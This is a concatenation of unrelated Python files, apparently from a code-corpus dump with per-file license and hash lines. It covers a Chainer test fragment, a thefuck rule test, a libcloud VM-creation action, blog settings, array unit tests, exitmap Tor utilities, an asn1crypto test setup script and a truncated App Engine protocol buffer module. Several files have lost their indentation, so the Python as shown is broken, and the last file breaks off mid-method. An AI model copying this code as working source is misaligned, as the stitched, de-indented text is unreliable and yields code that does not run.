self.optimizer.update()
self.assertEqual(self.actual_optimizer.t, 1)
self.optimizer.target.a.W.update_rule.update.assert_called_once_with(
self.optimizer.target.a.W)
self.optimizer.target.b.W.update_rule.update.assert_called_once_with(
self.optimizer.target.b.W)
self.optimizer.target.c.W.update_rule.update.assert_called_once_with(
self.optimizer.target.c.W)
base = (self.comm.size - 1.0) / 2
chainer.testing.assert_allclose(self.optimizer.target.a.W.grad,
(base + 0) * np.ones((3, 2)))
chainer.testing.assert_allclose(self.optimizer.target.b.W.grad,
(base + 1) * np.ones((4, 3)))
chainer.testing.assert_allclose(self.optimizer.target.c.W.grad,
(base + 2) * np.ones((4, 4)))
| mit | -7,424,995,401,902,875,000 | 42.666667 | 77 | 0.599237 | false |
petr-tichy/thefuck | tests/rules/test_django_south_merge.py | 20 | 2113 | import pytest
from thefuck.rules.django_south_merge import match, get_new_command
from tests.utils import Command
@pytest.fixture
def stderr():
return '''Running migrations for app:
! Migration app:0003_auto... should not have been applied before app:0002_auto__add_field_query_due_date_ but was.
Traceback (most recent call last):
File "/home/nvbn/work/.../bin/python", line 42, in <module>
    exec(compile(open(__file__).read(), __file__, "exec"))
File "/home/nvbn/work/.../app/manage.py", line 34, in <module>
execute_from_command_line(sys.argv)
File "/home/nvbn/work/.../lib/django/core/management/__init__.py", line 443, in execute_from_command_line
utility.execute()
File "/home/nvbn/work/.../lib/django/core/management/__init__.py", line 382, in execute
self.fetch_command(subcommand).run_from_argv(self.argv)
File "/home/nvbn/work/.../lib/django/core/management/base.py", line 196, in run_from_argv
self.execute(*args, **options.__dict__)
File "/home/nvbn/work/.../lib/django/core/management/base.py", line 232, in execute
output = self.handle(*args, **options)
File "/home/nvbn/work/.../app/lib/south/management/commands/migrate.py", line 108, in handle
ignore_ghosts = ignore_ghosts,
File "/home/nvbn/work/.../app/lib/south/migration/__init__.py", line 207, in migrate_app
raise exceptions.InconsistentMigrationHistory(problems)
south.exceptions.InconsistentMigrationHistory: Inconsistent migration history
The following options are available:
--merge: will just attempt the migration ignoring any potential dependency conflicts.
'''
def test_match(stderr):
assert match(Command('./manage.py migrate', stderr=stderr), None)
assert match(Command('python manage.py migrate', stderr=stderr), None)
assert not match(Command('./manage.py migrate'), None)
assert not match(Command('app migrate', stderr=stderr), None)
assert not match(Command('./manage.py test', stderr=stderr), None)
def test_get_new_command():
assert get_new_command(Command('./manage.py migrate auth'), None) \
== './manage.py migrate auth --merge'
| mit | 542,531,086,048,707,000 | 48.139535 | 115 | 0.710364 | false |
pinterb/st2contrib | packs/libcloud/actions/create_vm.py | 8 | 1847 | from libcloud.compute.base import NodeSize
from libcloud.compute.base import NodeImage
from libcloud.compute.base import NodeLocation
from lib.actions import BaseAction
__all__ = [
'CreateVMAction'
]
class CreateVMAction(BaseAction):
api_type = 'compute'
def run(self, credentials, name, size_id=None, image_id=None, size_name=None, image_name=None,
location_id=None):
driver = self._get_driver_for_credentials(credentials=credentials)
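        # Build a minimal NodeLocation stub from the supplied id; the other
        # fields are not known at this point and are left as None.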
location = NodeLocation(id=location_id, name=None,
country=None, driver=driver)
if (not size_id and not size_name) or (size_id and size_name):
raise ValueError('Either "size_id" or "size_name" needs to be provided')
if (not image_id and not image_name) or (image_id and image_name):
raise ValueError('Either "image_id" or "image_name" needs to be provided')
if size_id is not None:
size = NodeSize(id=size_id, name=None,
ram=None, disk=None, bandwidth=None,
price=None, driver=driver)
elif size_name is not None:
size = [s for s in driver.list_sizes() if size_name in s.name][0]
if image_id is not None:
image = NodeImage(id=image_id, name=None,
driver=driver)
elif image_name is not None:
            image = [i for i in driver.list_images() if
                     image_name in i.extra.get('displaytext', i.name)][0]
kwargs = {'name': name, 'size': size, 'image': image}
if location_id:
kwargs['location'] = location
self.logger.info('Creating node...')
node = driver.create_node(**kwargs)
self.logger.info('Node successfully created: %s' % (node))
return node
| apache-2.0 | -752,134,328,594,870,000 | 35.215686 | 98 | 0.592312 | false |
ismail-s/fireblog | fireblog/settings/mapping.py | 1 | 3714 | from collections import namedtuple
from . import validators
Entry = namedtuple('Entry', [
'registry_name', # Registry name
'display_name', # Display name
'description', # Description
'type', # eg int, str... A func that returns an obj of the right type.
    'default_value', # A default value that satisfies validator. This means
    # that code that depends on a setting always has some value to use, even
    # if the user hasn't changed the setting yet.
    'validator', # A function that takes a value and returns a bool
    # indicating if it is a valid entry
'min', # If type is a number, then this can be set to the min allowed num
'max', # Max allowed num (if type is a number)
'value' # If we know the value of this, then we set this to it.
])
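# Attach default values to the Entry constructor. __defaults__ applies to the
# rightmost parameters, and there are as many defaults as fields, so every
# Entry field is optional when constructing an instance.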
entry_defaults = (None,) * 3 + (lambda x: x, '', lambda x: True) + (None,) * 3
Entry.__new__.__defaults__ = entry_defaults
mapping = (
Entry(
'fireblog.max_rss_items',
'Max number of RSS items',
'The maximum number of items to show in the RSS feed. '
'The latest posts are shown in the RSS feed.',
int,
default_value=50,
min=1,
max=99999),
Entry(
'fireblog.all_view_post_len',
'Max length of post preview',
'Some webpages show previews of several posts. '
'Here, you can set how long those previews can be.',
int,
default_value=150,
min=1,
max=99999),
Entry(
'persona.siteName',
'Site name',
'Name of the website. If this is changed, then the website should be '
'restarted at some point in order to update the display of the '
'sitename in the login screen.',
str,
default_value='My blog',
validator=validators.sitename_validator),
Entry(
'persona.secret',
'Persona secret',
'This is a secret required by Mozilla Persona, the authentication '
'mechanism used on this blog. This should basically be some random '
'string.',
str,
default_value='change this to a random string'),
Entry(
'persona.audiences',
'Persona audiences',
'This should be a list of domains this blog is served on. This is '
'required by the Persona authentication mechanism. If a domain is '
'not on this list, then logins won\'t work from that domain.',
str,
# This default_value is a list of urls from which you should be able
# to login to the website before you have changed this setting.
# Changing this could mean that the end user has to modify the settings
# db directly just to login for the first time...
default_value='http://localhost:8080 https://localhost:8080'),
Entry(
'fireblog.recaptcha_secret',
'Recaptcha secret',
'The Recaptcha secret used for server-side validation to combat spam. '
'See https://www.google.com/recaptcha for more details.',
str,
default_value='Replace this with your recaptcha secret.',
validator=validators.recaptcha_validator),
Entry(
'fireblog.recaptcha_site_key',
'Recaptcha site key',
'The Recaptcha site key that is included in the html Recaptcha widget.'
' See https://www.google.com/recaptcha for more details.',
str,
default_value='Replace me with your recaptcha site key.',
validator=validators.recaptcha_validator),
Entry(
'fireblog.theme',
'Blog theme',
'The theme for this blog.',
str,
default_value='bootstrap',
validator=validators.theme_validator)
)
| gpl-2.0 | 6,351,171,381,094,050,000 | 38.510638 | 79 | 0.623586 | false |
chappers/script2package | example/script2package/script2package/__init__.py | 5 | 3175 | #!/usr/bin/env python
"""script2package: turn a python script into a python package"""
import argparse
import os.path
from script2package import *
def generate_skeleton(script=None, base="package"):
"""Generates a package skeleton within current working directory.
:param script: file path to the script of interest
:param base: name of the base folder for package generation
:return: this function returns nothing
"""
import os
from os.path import basename, splitext
from shutil import copyfile, rmtree
    if script is None:
        raise ValueError(
            "Script file must be provided within `generate_skeleton`!")
base_script = basename(script)
name, ext = splitext(base_script)
    if not ext.endswith("py"):
        raise ValueError(
            "Script file %s does not appear to be a python script!" % script)
# create folder layout
try:
rmtree(base)
    except OSError:
pass
os.makedirs('{base}/{name}'.format(base=base, name=name))
# create the setup.py
with open('{base}/setup.py'.format(base=base), 'w') as f:
setup_py = """#!/usr/bin/env python
from setuptools import setup
setup(
setup_requires=['d2to1'],
d2to1=True
)"""
f.write(setup_py)
# copy setup.cfg and readme.md if applicable
# will have to extend to other files in future
if os.path.isfile(os.path.join(os.path.dirname(script), 'setup.cfg')):
copyfile(os.path.join(os.path.dirname(script), 'setup.cfg'),
'{base}/setup.cfg'.format(base=base))
else:
# we have to generate the file
with open('{base}/setup.cfg'.format(base=base), 'w') as f:
setup_cfg = """
[metadata]
name = {name}
""".format(name=name)
f.write(setup_cfg)
if os.path.isfile(os.path.join(os.path.dirname(script), 'readme.md')):
copyfile(os.path.join(os.path.dirname(script), 'readme.md'),
'{base}/readme.md'.format(base=base))
# create __init__.py
with open('{base}/{name}/__init__.py'.format(base=base, name=name), 'w') as f:
f.write("""{script}""".format(script=open(script, 'r').read()))
# create __init__.py: this is redundant but needed for cli tools??
# have to have an option to turn this on or off
with open('{base}/{name}/__main__.py'.format(base=base, name=name), 'w') as f:
f.write("""{script}""".format(script=open(script, 'r').read()))
def main():
"""
`script2package` will correctly treat any `setup.cfg` files which it comes
across.
    If no `setup.cfg` is found, it will simply use the default setup settings,
    with the package taking the name of the script. The filename will be
automatically sanitized.
"""
parser = argparse.ArgumentParser()
parser.add_argument('script')
parser.add_argument('--base', action='store', default='package')
args = parser.parse_args()
    if args.script is None or not os.path.isfile(args.script):
        parser.error("Please enter a valid python script!")
generate_skeleton(args.script, base=args.base)
| mit | -6,684,506,078,431,677,000 | 32.421053 | 82 | 0.64063 | false |
dfroger/dfndarray | test/test_array1d.py | 1 | 3580 | import unittest
from dfndarray import DoubleArray1D, Array1DComputeTestValue
class TestArray1DBase:
"""Tests to pass whatever Array1D allocation method is"""
def test_str(self):
expected_re = "<Array1D of shape \(4\) at 0x\w*>"
s = '%s' % self.a
self.assertRegexpMatches(s, expected_re)
def test_getitem(self):
self.assertEqual(self.a[0], 0.)
self.assertEqual(self.a[1], 1.)
self.assertEqual(self.a[2], 2.)
self.assertEqual(self.a[3], 3.)
def test_size(self):
self.assertEqual(self.a.n0(), 4)
self.assertEqual(self.a.dim(0), 4)
self.assertEqual(self.a.size(), 4)
def test_out_of_bounds(self):
regexp = "expected 'i0 < m_n0', but got: '10 >= 4'"
self.assertRaisesRegexp(RuntimeError, regexp, self.a.__getitem__,10)
def test_fill(self):
self.a.fill(7)
self.assertEqual(self.a[0], 7.)
self.assertEqual(self.a[1], 7.)
self.assertEqual(self.a[2], 7.)
self.assertEqual(self.a[3], 7.)
def test_resize_equal(self):
self.a.resize(4)
self.assertEqual(self.a[0], 0.)
self.assertEqual(self.a[1], 1.)
self.assertEqual(self.a[2], 2.)
self.assertEqual(self.a[3], 3.)
self.assertEqual(self.a.n0(), 4)
self.assertEqual(self.a.dim(0), 4)
self.assertEqual(self.a.size(), 4)
def test_resize_less(self):
self.a.resize(2)
self.assertEqual(self.a[0], 0.)
self.assertEqual(self.a[1], 1.)
self.assertEqual(self.a.n0(), 2)
self.assertEqual(self.a.dim(0), 2)
self.assertEqual(self.a.size(), 2)
def test_resize_greater(self):
self.a.resize(6)
self.assertEqual(self.a[0], 0.)
self.assertEqual(self.a[1], 1.)
self.assertEqual(self.a[2], 2.)
self.assertEqual(self.a[3], 3.)
self.assertEqual(self.a[4], 0.)
self.assertEqual(self.a[5], 0.)
self.assertEqual(self.a.n0(), 6)
self.assertEqual(self.a.dim(0), 6)
self.assertEqual(self.a.size(), 6)
def test_reallocate(self):
self.assertRaises(RuntimeError,self.a.allocate,4)
class TestArray1DAllocateConstructor(unittest.TestCase, TestArray1DBase):
"""Test Array1D allocated in constructor"""
def setUp(self):
self.a = DoubleArray1D(4)
f = Array1DComputeTestValue()
self.a.fill(f)
class TestArray1DAllocateMethod(unittest.TestCase, TestArray1DBase):
"""Test Array1D allocated in constructor method"""
def setUp(self):
self.a = DoubleArray1D()
self.a.allocate(4)
f = Array1DComputeTestValue()
self.a.fill(f)
class TestArray1DAllocateResize(unittest.TestCase, TestArray1DBase):
"""Test Array1D allocated in constructor method"""
def setUp(self):
self.a = DoubleArray1D()
self.a.resize(4)
f = Array1DComputeTestValue()
self.a.fill(f)
class TestArray1DNotAllocated(unittest.TestCase):
def setUp(self):
self.a = DoubleArray1D()
def test_str(self):
expected_re = "<Array1D not allocated>"
s = '%s' % self.a
self.assertRegexpMatches(s, expected_re)
def test_getitem(self):
self.assertRaises(RuntimeError,self.a.__getitem__,0)
def test_size(self):
self.assertEqual(self.a.n0(), 0)
self.assertEqual(self.a.dim(0), 0)
self.assertEqual(self.a.size(), 0)
def test_fill(self):
self.assertRaises(RuntimeError,self.a.fill,7)
if __name__ == '__main__':
unittest.main()
| gpl-3.0 | 2,419,825,719,442,931,000 | 28.105691 | 76 | 0.607821 | false |
thylong/exitmap | src/util.py | 1 | 5849 | # Copyright 2013-2015 Philipp Winter <[email protected]>
#
# This file is part of exitmap.
#
# exitmap is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# exitmap is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with exitmap. If not, see <http://www.gnu.org/licenses/>.
"""
Provides utility functions.
"""
import os
import re
import urllib2
import json
import tempfile
import errno
from stem.descriptor.reader import DescriptorReader
import log
logger = log.get_logger()
# Holds the directory to which we can write temporary analysis results.
analysis_dir = None
def parse_log_lines(ports, log_line):
"""
Extract the SOCKS and control port from Tor's log output.
Both ports are written to the given dictionary.
"""
logger.debug("Tor says: %s" % log_line)
if re.search(r"^.*Bootstrapped \d+%.*$", log_line):
logger.info(re.sub(r"^.*(Bootstrapped \d+%.*)$", r"Tor \1", log_line))
socks_pattern = "Socks listener listening on port ([0-9]{1,5})."
control_pattern = "Control listener listening on port ([0-9]{1,5})."
match = re.search(socks_pattern, log_line)
if match:
ports["socks"] = int(match.group(1))
logger.debug("Tor uses port %d as SOCKS port." % ports["socks"])
match = re.search(control_pattern, log_line)
if match:
ports["control"] = int(match.group(1))
logger.debug("Tor uses port %d as control port." % ports["control"])
def relay_in_consensus(fingerprint, cached_consensus_path):
"""
Check if a relay is part of the consensus.
If the relay identified by `fingerprint' is part of the given `consensus',
True is returned. If not, False is returned.
"""
fingerprint = fingerprint.upper()
with DescriptorReader(cached_consensus_path) as reader:
for descriptor in reader:
if descriptor.fingerprint == fingerprint:
return True
return False
def get_source_port(stream_line):
"""
Extract the source port from a stream event.
"""
pattern = "SOURCE_ADDR=[0-9\.]{7,15}:([0-9]{1,5})"
match = re.search(pattern, stream_line)
if match:
return int(match.group(1))
return None
def extract_pattern(line, pattern):
"""
Look for the given 'pattern' in 'line'.
If it is found, the match is returned. Otherwise, 'None' is returned.
"""
match = re.search(pattern, line)
if match:
return match.group(1)
return None
def get_relays_in_country(country_code):
"""
Return a list of the fingerprint of all relays in the given country code.
The fingerprints are obtained by querying Onionoo. In case of an error, an
empty list is returned.
"""
country_code = country_code.lower()
onionoo_url = "https://onionoo.torproject.org/details?country="
logger.info("Attempting to fetch all relays with country code \"%s\" "
"from Onionoo." % country_code)
try:
data = urllib2.urlopen("%s%s" % (onionoo_url, country_code)).read()
except Exception as err:
logger.warning("urlopen() failed: %s" % err)
return []
try:
response = json.loads(data)
except ValueError as err:
logger.warning("json.loads() failed: %s" % err)
return []
fingerprints = [desc["fingerprint"] for desc in response["relays"]]
logger.info("Onionoo gave us %d (exit and non-exit) fingerprints." %
len(fingerprints))
return fingerprints
def exiturl(exit_fpr):
"""
Return an Atlas link for the exit relay fingerprint.
"""
return "<https://atlas.torproject.org/#details/%s>" % exit_fpr
def dump_to_file(blurb, exit_fpr):
"""
Dump the given blurb to a randomly generated file which contains exit_fpr.
This function is useful to save data obtained from bad exit relays to file
for later analysis.
"""
    if analysis_dir is not None:
        try:
            os.makedirs(analysis_dir)
        except OSError as err:
            if err.errno != errno.EEXIST:
                raise
if analysis_dir is None:
fd, file_name = tempfile.mkstemp(prefix="%s_" % exit_fpr)
else:
fd, file_name = tempfile.mkstemp(prefix="%s_" % exit_fpr,
dir=analysis_dir)
try:
with open(file_name, "w") as fd:
fd.write(blurb)
except IOError as err:
logger.warning("Couldn't write to \"%s\": %s" % (file_name, err))
return None
logger.debug("Wrote %d-length blurb to file \"%s\"." %
(len(blurb), file_name))
return file_name
def new_request(url, data=None):
"""
Return a request object whose HTTP header resembles TorBrowser.
"""
request = urllib2.Request(url, data)
# Try to resemble the HTTP request of TorBrowser as closely as possible.
# Note that the order of header fields is also relevant but urllib2 uses a
# dictionary for headers, which is orderless.
request.add_header("User-Agent", "Mozilla/5.0 (Windows NT 6.1; rv:31.0) "
"Gecko/20100101 Firefox/31.0")
request.add_header("Accept", "text/html,application/xhtml+xml,"
"application/xml;q=0.9,*/*;q=0.8")
request.add_header("Accept-Language", "en-us,en;q=0.5")
request.add_header("Accept-Encoding", "gzip, deflate")
request.add_header("Connection", "keep-alive")
return request
| gpl-3.0 | 8,049,871,103,180,259,000 | 27.256039 | 79 | 0.637716 | false |
wbond/asn1crypto | tests/setup.py | 1 | 4750 | import codecs
import os
import shutil
import sys
import warnings
import setuptools
from setuptools import setup, Command
from setuptools.command.egg_info import egg_info
PACKAGE_NAME = 'asn1crypto'
PACKAGE_VERSION = '1.4.0'
TEST_PACKAGE_NAME = '%s_tests' % PACKAGE_NAME
TESTS_ROOT = os.path.dirname(os.path.abspath(__file__))
# setuptools 38.6.0 and newer know about long_description_content_type, but
# distutils still complains about it, so silence the warning
sv = setuptools.__version__
svi = tuple(int(o) if o.isdigit() else o for o in sv.split('.'))
if svi >= (38, 6):
warnings.filterwarnings(
'ignore',
"Unknown distribution option: 'long_description_content_type'",
module='distutils.dist'
)
# Older versions of distutils would take a glob pattern and return dirs
# and then would complain that it couldn't copy a dir like a file, so we
# have to build an explicit list of file names
data_files = []
fixtures_dir = os.path.join(TESTS_ROOT, 'fixtures')
for root, dirs, files in os.walk(fixtures_dir):
for filename in files:
data_files.append(os.path.join(root, filename)[len(TESTS_ROOT) + 1:])
package_data = {
TEST_PACKAGE_NAME: data_files
}
# This allows us to send the LICENSE when creating a sdist. Wheels
# automatically include the license, and don't need the docs. For these
# to be included, the command must be "python setup.py sdist".
if sys.argv[1:] == ['sdist'] or sorted(sys.argv[1:]) == ['-q', 'sdist']:
package_data[TEST_PACKAGE_NAME].extend([
'LICENSE',
'readme.md',
])
# Ensures a copy of the LICENSE is included with the egg-info for
# install and bdist_egg commands
class EggInfoCommand(egg_info):
def run(self):
egg_info_path = os.path.join(
TESTS_ROOT,
'%s.egg-info' % TEST_PACKAGE_NAME
)
if not os.path.exists(egg_info_path):
os.mkdir(egg_info_path)
shutil.copy2(
os.path.join(TESTS_ROOT, 'LICENSE'),
os.path.join(egg_info_path, 'LICENSE')
)
egg_info.run(self)
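# Custom "clean" command: removes build/, temp/ and the egg-info directory, as
# well as compiled .pyc files and __pycache__ folders; "clean --all" also
# removes dist/.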
class CleanCommand(Command):
user_options = [
('all', 'a', '(Compatibility with original clean command)'),
]
def initialize_options(self):
self.all = False
def finalize_options(self):
pass
def run(self):
sub_folders = ['build', 'temp', '%s.egg-info' % TEST_PACKAGE_NAME]
if self.all:
sub_folders.append('dist')
for sub_folder in sub_folders:
full_path = os.path.join(TESTS_ROOT, sub_folder)
if os.path.exists(full_path):
shutil.rmtree(full_path)
for root, dirs, files in os.walk(TESTS_ROOT):
for filename in files:
if filename[-4:] == '.pyc':
os.unlink(os.path.join(root, filename))
for dirname in list(dirs):
if dirname == '__pycache__':
shutil.rmtree(os.path.join(root, dirname))
readme = ''
with codecs.open(os.path.join(TESTS_ROOT, 'readme.md'), 'r', 'utf-8') as f:
readme = f.read()
setup(
name=TEST_PACKAGE_NAME,
version=PACKAGE_VERSION,
description=(
'Test suite for asn1crypto, separated due to file size'
),
long_description=readme,
long_description_content_type='text/markdown',
url='https://github.com/wbond/asn1crypto',
author='wbond',
author_email='[email protected]',
license='MIT',
classifiers=[
'Development Status :: 5 - Production/Stable',
'Intended Audience :: Developers',
'License :: OSI Approved :: MIT License',
'Programming Language :: Python',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 2.6',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.2',
'Programming Language :: Python :: 3.3',
'Programming Language :: Python :: 3.4',
'Programming Language :: Python :: 3.5',
'Programming Language :: Python :: 3.6',
'Programming Language :: Python :: 3.7',
'Programming Language :: Python :: 3.8',
'Programming Language :: Python :: Implementation :: CPython',
'Programming Language :: Python :: Implementation :: PyPy',
'Topic :: Security :: Cryptography',
],
keywords='asn1 crypto pki x509 certificate rsa dsa ec dh',
packages=[TEST_PACKAGE_NAME],
package_dir={TEST_PACKAGE_NAME: '.'},
package_data=package_data,
install_requires=[
'%s==%s' % (PACKAGE_NAME, PACKAGE_VERSION),
],
cmdclass={
'clean': CleanCommand,
'egg_info': EggInfoCommand,
}
)
| mit | 5,509,437,058,154,964,000 | 29.448718 | 77 | 0.613053 | false |
undoware/neutron-drive | google_appengine/google/appengine/api/files/file_service_pb.py | 12 | 146256 | #!/usr/bin/env python
#
# Copyright 2007 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from google.net.proto import ProtocolBuffer
import array
import dummy_thread as thread
__pychecker__ = """maxreturns=0 maxbranches=0 no-callinit
unusednames=printElemNumber,debug_strs no-special"""
if hasattr(ProtocolBuffer, 'ExtendableProtocolMessage'):
_extension_runtime = True
_ExtendableProtocolMessage = ProtocolBuffer.ExtendableProtocolMessage
else:
_extension_runtime = False
_ExtendableProtocolMessage = ProtocolBuffer.ProtocolMessage
from google.appengine.api.api_base_pb import *
import google.appengine.api.api_base_pb
class FileServiceErrors(ProtocolBuffer.ProtocolMessage):
OK = 0
API_TEMPORARILY_UNAVAILABLE = 1
REQUEST_TOO_LARGE = 3
RESPONSE_TOO_LARGE = 4
INVALID_FILE_NAME = 5
OPERATION_NOT_SUPPORTED = 6
IO_ERROR = 7
PERMISSION_DENIED = 8
WRONG_CONTENT_TYPE = 9
FILE_NOT_OPENED = 10
WRONG_OPEN_MODE = 11
EXCLUSIVE_LOCK_REQUIRED = 12
FILE_TEMPORARILY_UNAVAILABLE = 13
EXISTENCE_ERROR = 100
FINALIZATION_ERROR = 101
UNSUPPORTED_CONTENT_TYPE = 102
READ_ONLY = 103
EXCLUSIVE_LOCK_FAILED = 104
EXISTENCE_ERROR_METADATA_NOT_FOUND = 105
EXISTENCE_ERROR_METADATA_FOUND = 106
EXISTENCE_ERROR_SHARDING_MISMATCH = 107
FINALIZATION_IN_PROGRESS = 108
EXISTENCE_ERROR_OBJECT_NOT_FOUND = 109
EXISTENCE_ERROR_BUCKET_NOT_FOUND = 110
SEQUENCE_KEY_OUT_OF_ORDER = 300
OUT_OF_BOUNDS = 500
GLOBS_NOT_SUPPORTED = 600
FILE_NAME_NOT_SPECIFIED = 701
FILE_NAME_SPECIFIED = 702
FILE_ALREADY_EXISTS = 703
UNSUPPORTED_FILE_SYSTEM = 704
INVALID_PARAMETER = 705
SHUFFLER_INTERNAL_ERROR = 800
SHUFFLE_REQUEST_TOO_LARGE = 801
DUPLICATE_SHUFFLE_NAME = 802
SHUFFLE_NOT_AVAILABLE = 803
SHUFFLER_TEMPORARILY_UNAVAILABLE = 900
MAX_ERROR_CODE = 9999
_ErrorCode_NAMES = {
0: "OK",
1: "API_TEMPORARILY_UNAVAILABLE",
3: "REQUEST_TOO_LARGE",
4: "RESPONSE_TOO_LARGE",
5: "INVALID_FILE_NAME",
6: "OPERATION_NOT_SUPPORTED",
7: "IO_ERROR",
8: "PERMISSION_DENIED",
9: "WRONG_CONTENT_TYPE",
10: "FILE_NOT_OPENED",
11: "WRONG_OPEN_MODE",
12: "EXCLUSIVE_LOCK_REQUIRED",
13: "FILE_TEMPORARILY_UNAVAILABLE",
100: "EXISTENCE_ERROR",
101: "FINALIZATION_ERROR",
102: "UNSUPPORTED_CONTENT_TYPE",
103: "READ_ONLY",
104: "EXCLUSIVE_LOCK_FAILED",
105: "EXISTENCE_ERROR_METADATA_NOT_FOUND",
106: "EXISTENCE_ERROR_METADATA_FOUND",
107: "EXISTENCE_ERROR_SHARDING_MISMATCH",
108: "FINALIZATION_IN_PROGRESS",
109: "EXISTENCE_ERROR_OBJECT_NOT_FOUND",
110: "EXISTENCE_ERROR_BUCKET_NOT_FOUND",
300: "SEQUENCE_KEY_OUT_OF_ORDER",
500: "OUT_OF_BOUNDS",
600: "GLOBS_NOT_SUPPORTED",
701: "FILE_NAME_NOT_SPECIFIED",
702: "FILE_NAME_SPECIFIED",
703: "FILE_ALREADY_EXISTS",
704: "UNSUPPORTED_FILE_SYSTEM",
705: "INVALID_PARAMETER",
800: "SHUFFLER_INTERNAL_ERROR",
801: "SHUFFLE_REQUEST_TOO_LARGE",
802: "DUPLICATE_SHUFFLE_NAME",
803: "SHUFFLE_NOT_AVAILABLE",
900: "SHUFFLER_TEMPORARILY_UNAVAILABLE",
9999: "MAX_ERROR_CODE",
}
def ErrorCode_Name(cls, x): return cls._ErrorCode_NAMES.get(x, "")
ErrorCode_Name = classmethod(ErrorCode_Name)
def __init__(self, contents=None):
pass
if contents is not None: self.MergeFromString(contents)
def MergeFrom(self, x):
assert x is not self
def Equals(self, x):
if x is self: return 1
return 1
def IsInitialized(self, debug_strs=None):
initialized = 1
return initialized
def ByteSize(self):
n = 0
return n
def ByteSizePartial(self):
n = 0
return n
def Clear(self):
pass
def OutputUnchecked(self, out):
pass
def OutputPartial(self, out):
pass
def TryMerge(self, d):
while d.avail() > 0:
tt = d.getVarInt32()
if (tt == 0): raise ProtocolBuffer.ProtocolBufferDecodeError
d.skipData(tt)
def __str__(self, prefix="", printElemNumber=0):
res=""
return res
def _BuildTagLookupTable(sparse, maxtag, default=None):
return tuple([sparse.get(i, default) for i in xrange(0, 1+maxtag)])
_TEXT = _BuildTagLookupTable({
0: "ErrorCode",
}, 0)
_TYPES = _BuildTagLookupTable({
0: ProtocolBuffer.Encoder.NUMERIC,
}, 0, ProtocolBuffer.Encoder.MAX_TYPE)
_STYLE = """"""
_STYLE_CONTENT_TYPE = """"""
_PROTO_DESCRIPTOR_NAME = 'apphosting.files.FileServiceErrors'
class KeyValue(ProtocolBuffer.ProtocolMessage):
has_key_ = 0
key_ = ""
has_value_ = 0
value_ = ""
def __init__(self, contents=None):
if contents is not None: self.MergeFromString(contents)
def key(self): return self.key_
def set_key(self, x):
self.has_key_ = 1
self.key_ = x
def clear_key(self):
if self.has_key_:
self.has_key_ = 0
self.key_ = ""
def has_key(self): return self.has_key_
def value(self): return self.value_
def set_value(self, x):
self.has_value_ = 1
self.value_ = x
def clear_value(self):
if self.has_value_:
self.has_value_ = 0
self.value_ = ""
def has_value(self): return self.has_value_
def MergeFrom(self, x):
assert x is not self
if (x.has_key()): self.set_key(x.key())
if (x.has_value()): self.set_value(x.value())
def Equals(self, x):
if x is self: return 1
if self.has_key_ != x.has_key_: return 0
if self.has_key_ and self.key_ != x.key_: return 0
if self.has_value_ != x.has_value_: return 0
if self.has_value_ and self.value_ != x.value_: return 0
return 1
def IsInitialized(self, debug_strs=None):
initialized = 1
if (not self.has_key_):
initialized = 0
if debug_strs is not None:
debug_strs.append('Required field: key not set.')
if (not self.has_value_):
initialized = 0
if debug_strs is not None:
debug_strs.append('Required field: value not set.')
return initialized
def ByteSize(self):
n = 0
n += self.lengthString(len(self.key_))
n += self.lengthString(len(self.value_))
return n + 2
def ByteSizePartial(self):
n = 0
if (self.has_key_):
n += 1
n += self.lengthString(len(self.key_))
if (self.has_value_):
n += 1
n += self.lengthString(len(self.value_))
return n
def Clear(self):
self.clear_key()
self.clear_value()
def OutputUnchecked(self, out):
out.putVarInt32(10)
out.putPrefixedString(self.key_)
out.putVarInt32(18)
out.putPrefixedString(self.value_)
def OutputPartial(self, out):
if (self.has_key_):
out.putVarInt32(10)
out.putPrefixedString(self.key_)
if (self.has_value_):
out.putVarInt32(18)
out.putPrefixedString(self.value_)
def TryMerge(self, d):
while d.avail() > 0:
tt = d.getVarInt32()
if tt == 10:
self.set_key(d.getPrefixedString())
continue
if tt == 18:
self.set_value(d.getPrefixedString())
continue
if (tt == 0): raise ProtocolBuffer.ProtocolBufferDecodeError
d.skipData(tt)
def __str__(self, prefix="", printElemNumber=0):
res=""
if self.has_key_: res+=prefix+("key: %s\n" % self.DebugFormatString(self.key_))
if self.has_value_: res+=prefix+("value: %s\n" % self.DebugFormatString(self.value_))
return res
def _BuildTagLookupTable(sparse, maxtag, default=None):
return tuple([sparse.get(i, default) for i in xrange(0, 1+maxtag)])
kkey = 1
kvalue = 2
_TEXT = _BuildTagLookupTable({
0: "ErrorCode",
1: "key",
2: "value",
}, 2)
_TYPES = _BuildTagLookupTable({
0: ProtocolBuffer.Encoder.NUMERIC,
1: ProtocolBuffer.Encoder.STRING,
2: ProtocolBuffer.Encoder.STRING,
}, 2, ProtocolBuffer.Encoder.MAX_TYPE)
_STYLE = """"""
_STYLE_CONTENT_TYPE = """"""
_PROTO_DESCRIPTOR_NAME = 'apphosting.files.KeyValue'
class KeyValues(ProtocolBuffer.ProtocolMessage):
has_key_ = 0
key_ = ""
has_partial_ = 0
partial_ = 0
def __init__(self, contents=None):
self.value_ = []
if contents is not None: self.MergeFromString(contents)
def key(self): return self.key_
def set_key(self, x):
self.has_key_ = 1
self.key_ = x
def clear_key(self):
if self.has_key_:
self.has_key_ = 0
self.key_ = ""
def has_key(self): return self.has_key_
def value_size(self): return len(self.value_)
def value_list(self): return self.value_
def value(self, i):
return self.value_[i]
def set_value(self, i, x):
self.value_[i] = x
def add_value(self, x):
self.value_.append(x)
def clear_value(self):
self.value_ = []
def partial(self): return self.partial_
def set_partial(self, x):
self.has_partial_ = 1
self.partial_ = x
def clear_partial(self):
if self.has_partial_:
self.has_partial_ = 0
self.partial_ = 0
def has_partial(self): return self.has_partial_
def MergeFrom(self, x):
